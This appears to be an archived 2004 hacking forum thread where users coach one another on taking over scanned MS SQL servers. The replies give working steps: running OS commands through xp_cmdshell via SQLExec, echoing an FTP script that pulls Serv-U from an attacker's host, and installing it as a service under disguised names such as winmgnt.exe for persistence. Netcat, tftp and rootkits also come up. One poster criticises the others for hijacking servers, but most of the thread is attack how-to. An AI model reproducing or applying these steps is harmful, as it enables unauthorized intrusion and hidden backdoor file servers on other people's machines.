arun0075
Feb 12 2004, 05:03 PM
hmm... first time in my life i scaned for SQL and this time i got hit by a lot of ips wow but i don't know how to use SQL for rooting.. i always use to have nt for rooting as bots before but is there any ways to root SQL.. hmm.. how to uplaod files and execute them is there a simple way for it.. i got SQLexec but to be true i am very new to SQL stuff
NE HELP
Thom
Feb 12 2004, 05:08 PM
Its just like cmd.exe but with a few diffrences, just make it connect to a FTP DL some files and launch them...
tyler.durden
Feb 12 2004, 05:08 PM
| QUOTE (arun0075 @ Feb 12 2004, 05:03 PM) |
hmm... first time in my life i scaned for SQL and this time i got hit by a lot of ips wow but i don't know how to use SQL for rooting.. i always use to have nt for rooting as bots before but is there any ways to root SQL.. hmm.. how to uplaod files and execute them is there a simple way for it.. i got SQLexec but to be true i am very new to SQL stuff
NE HELP |
with SQLExec you dont need to know SQL...
it use the
xp_cmdshell for run a OS command... every time the commad end the session is closed, so if you run a command like "cd <dir>", at next runf you are not more in that dir. So you must create your script by echoing.
I hope this can help you a little bit... if I wrong something please tell me
ShadowRun
Feb 12 2004, 05:12 PM
if u have sqlexec then it's simple
i wonder if u know what it's for
u should say sqlserver
sql is simple query language
and is used in all databases
there's a huge difference between
mysql | ms sql server | oracle
greetz
F34R
Feb 14 2004, 04:47 PM
All you need are SQLexec, An FTP server, and a rootkit to get the job done.
Use ECHO commands.
THere have been several posts in the past on this subject... just do a little browsing and you'll find what you need.
Cya.
t00sTr0nG
Feb 14 2004, 06:59 PM
or you can use netcat, but with SQLexec it is easier!
THX
t00sTr0nG
eXist
Feb 14 2004, 11:28 PM
One of the simplest methods is just to echo commands into a .txt file and then tell it to use it with FTP. This method won't always work, as you might be met with SQL_ERROR when trying to echo into a file.
As has been said before, check through the forums and you'll find many threads/posts that will help you.
fre4k
Feb 15 2004, 02:05 PM
here are some shit for you, can help you in your sqlexec/cmd
| CODE |
ASSOC Displays or modifies file extension associations
AT Schedules commands and programs to run on a computer.
ATTRIB Displays or changes file attributes.
BREAK Sets or clears extended CTRL+C checking.
CACLS Displays or modifies access control lists (ACLs) of files.
CALL Calls one batch program from another.
CD Displays the name of or changes the current directory.
CHCP Displays or sets the active code page number.
CHDIR Displays the name of or changes the current directory.
CHKDSK Checks a disk and displays a status report.
CHKNTFS Displays or modifies the checking of disk at boot time.
CLS Clears the screen.
CMD Starts a new instance of the Windows 2000 command interpreter.
COLOR Sets the default console foreground and background colors.
COMP Compares the contents of two files or sets of files.
COMPACT Displays or alters the compression of files on NTFS partitions.
CONVERT Converts FAT volumes to NTFS. You cannot convert the
current drive.
COPY Copies one or more files to another location.
DATE Displays or sets the date.
DEL Deletes one or more files.
DIR Displays a list of files and subdirectories in a directory.
DISKCOMP Compares the contents of two floppy disks.
DISKCOPY Copies the contents of one floppy disk to another.
DOSKEY Edits command lines, recalls Windows 2000 commands, and creates macro
ECHO Displays messages, or turns command echoing on or off.
ENDLOCAL Ends localization of environment changes in a batch file.
ERASE Deletes one or more files.
EXIT Quits the CMD.EXE program (command interpreter).
FC Compares two files or sets of files, and displays the differences
between them.
FIND Searches for a text string in a file or files.
FINDSTR Searches for strings in files.
FOR Runs a specified command for each file in a set of files.
FORMAT Formats a disk for use with Windows 2000.
FTYPE Displays or modifies file types used in file extension associations.
GOTO Directs the Windows 2000 command interpreter to a labeled line in a
batch program.
GRAFTABL Enables Windows 2000 to display an extended character set in graphics
mode.
HELP Provides Help information for Windows 2000 commands.
IF Performs conditional processing in batch programs.
LABEL Creates, changes, or deletes the volume label of a disk.
MD Creates a directory.
MKDIR Creates a directory.
MODE Configures a system device.
MORE Displays output one screen at a time.
MOVE Moves one or more files from one directory to another directory.
PATH Displays or sets a search path for executable files.
PAUSE Suspends processing of a batch file and displays a message.
POPD Restores the previous value of the current directory saved by PUSHD.
PRINT Prints a text file.
PROMPT Changes the Windows 2000 command prompt.
PUSHD Saves the current directory then changes it.
RD Removes a directory.
RECOVER Recovers readable information from a bad or defective disk.
REM Records comments (remarks) in batch files or CONFIG.SYS.
REN Renames a file or files.
RENAME Renames a file or files.
REPLACE Replaces files.
RMDIR Removes a directory.
SET Displays, sets, or removes Windows 2000 environment variables.
SETLOCAL Begins localization of environment changes in a batch file.
SHIFT Shifts the position of replaceable parameters in batch files.
SORT Sorts input.
START Starts a separate window to run a specified program or command.
SUBST Associates a path with a drive letter.
TIME Displays or sets the system time.
TITLE Sets the window title for a CMD.EXE session.
TREE Graphically displays the directory structure of a drive or path.
TYPE Displays the contents of a text file.
VER Displays the Windows 2000 version.
VERIFY Tells Windows 2000 whether to verify that your files are written
correctly to a disk.
VOL Displays a disk volume label and serial number.
XCOPY Copies files and directory trees. |
And here The echo-commandos, that you can upload servu from a put into your Target:
First make a dir:
mkdir c:\winnt\addins\setup\inst
Then these:
echo open 208.*.*.*>>c:\winnt\addins\setup\inst\script.txt
echo anonymous>>c:\winnt\addins\setup\inst\script.txt
echo anonymous@lol.com>>c:\winnt\addins\setup\inst\script.txt
echo BINARY>>c:\winnt\addins\setup\inst\script.txt
echo get serv-u.exe>>c:\winnt\addins\setup\inst\script.txt
echo get serv-u.ini>>c:\winnt\addins\setup\inst\script.txt
echo quit>>c:\winnt\addins\setup\inst\script.txt
To start the script try:
ftp -s:c:\winnt\addins\setup\inst\script.txt
Now wait a a couple of time...
Now you have Serv-u in in c:\ and you can move it were you want! the commands are on top
and start:
start c:\....
good luck
-fre4k
jak3c
Feb 15 2004, 06:47 PM
yes the best way is to echoing your command or tftping your files
desisam
Feb 16 2004, 01:52 AM
echo open 208.*.*.*>>
what this * means///help me
Nexcess
Feb 16 2004, 02:46 AM
hrm does sqlexec work on mysql as well?
SyN/AcK
Feb 16 2004, 04:56 AM
| QUOTE (desisam @ Feb 16 2004, 01:52 AM) |
echo open 208.*.*.*>>
what this * means///help me |
He's starring out the last two octets of his IP address for anonymity.
SyN/AcK
Feb 16 2004, 05:07 AM
| QUOTE (Nexcess @ Feb 16 2004, 02:46 AM) |
| hrm does sqlexec work on mysql as well? |
No it does not. Only MS SQL.
arun0075
Feb 17 2004, 02:23 AM
thanks u guys it helped me a lot and also Sqlexec work on MS_SQL for me..
arun0075
Feb 19 2004, 01:23 AM
dude hmmm.. i have sucessfully uploaded the files but where did the file uploaded no idea.. and can u please tell me the commad to move the file and also to start it.. please thanks
arun0075
Feb 19 2004, 01:47 AM
hmm.. ok i found out where the files got uploaded
and now when i start the serv-u it get stuck see this below
| QUOTE |
Sqlcmd>start c:\winnt\system32\winmgnt.exe
|
and this is end it's not starting the file
why is that
setthesun
Feb 19 2004, 06:26 AM
Also yu can use MS tool osql.exe for executing remote commands and dumping remote / local databases.
Rave4
Feb 19 2004, 08:27 AM
There is a program called sqlexecgui for that.
Stephen79
Feb 19 2004, 09:17 AM
| QUOTE (arun0075 @ Feb 19 2004, 02:47 AM) |
hmm.. ok i found out where the files got uploaded
and now when i start the serv-u it get stuck see this below
| QUOTE | Sqlcmd>start c:\winnt\system32\winmgnt.exe
|
and this is end it's not starting the file why is that |
should be
| CODE |
net start servicename
|
arun0075
Feb 19 2004, 04:39 PM
is there any other software like sqlexec which have the same funtion as sqlexec
arun0075
Feb 20 2004, 08:46 AM
hmmm see the following errors i get when i want to start the serv-u ftp :
The first type of error:
| QUOTE |
Sqlcmd>net start c:\winnt\system32\winmgnt.exe
The service name is invalid.
More help is available by typing NET HELPMSG 2185. |
The second type of error
| QUOTE |
Sqlcmd>net start winmgnt.exe
The service name is invalid.
More help is available by typing NET HELPMSG 2185. |
The third type of error this is too funny it get stuck at this point only lol and don't even start serv-u
| QUOTE |
Sqlcmd>start c:\winnt\system32\winmgnt.exe
and also this
Sqlcmd>start winmgnt.exe |
EDIT: so what is the ways which i can use to start serv-u on sql please help..
rvd
Feb 20 2004, 09:58 AM
I use sqlexec if the files are uploaded i do:
c:\winnt\system32\winmgnt.exe /i
net start serv-u
or
net start winmgnt.exe
if everything is allright then you can connect to you server @ the port you entered in your host.ini (or servudeamon.ini)
Hope this helps greetz
DumpZ
Mar 1 2004, 02:32 PM
To start the files i always do
| CODE |
serv-u.exe /i
serv-u.exe /h
net start serv-u
|
IcedOut3E
Mar 1 2004, 11:50 PM
Do the files that, like nc.exe and serv-u.exe have to be in the same directory that sqlexec is in?
Reason I ask is I am having trouble getting files to upload.
Killaloop
Mar 2 2004, 04:04 PM
befor you want to hack anything.
learn the damned dos commands, booh you even should know them if it wasn't for hacking.
since you kids use sqlexec to send cmds to the mssql server you use the xp_cmdshell which passes your input directly to cmd.exe and therefor every dos command will work.
so stop doing shit with other people server if you dont even know how to start a file using cmd line.
I know this is beginner section but does this mean all you are able to do is press the button to boot your pc and shut it down or are you able to use your brains?
I guess microsoft made it to easy for kids to use there putters.
it really sucks
usch
Mar 2 2004, 04:19 PM
yeah
type "help" in your console at your home pc and study a bit.it is awesome and neccessary for hacking sql
Falcor
Apr 1 2004, 07:25 PM
winmgnt /i /h
net start secman
Montague
Apr 5 2004, 09:07 AM
I start the ServU's (whatever) like this:
c:\mydirectory\bla\SQLSecurity32.exe c:\mydirectory\bla\SQLSecurity32.ini
And it works for me.
BacKZoiD
Killaloop
Apr 5 2004, 09:31 AM
| QUOTE (BacKZoiD @ Apr 5 2004, 09:07 AM) |
I start the ServU's (whatever) like this:
c:\mydirectory\bla\SQLSecurity32.exe c:\mydirectory\bla\SQLSecurity32.ini
And it works for me.
BacKZoiD |
yep
until to next reboot. then your serv-u wont run anymore since you didn't add it as a service.
mfld
Apr 7 2004, 03:44 AM
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
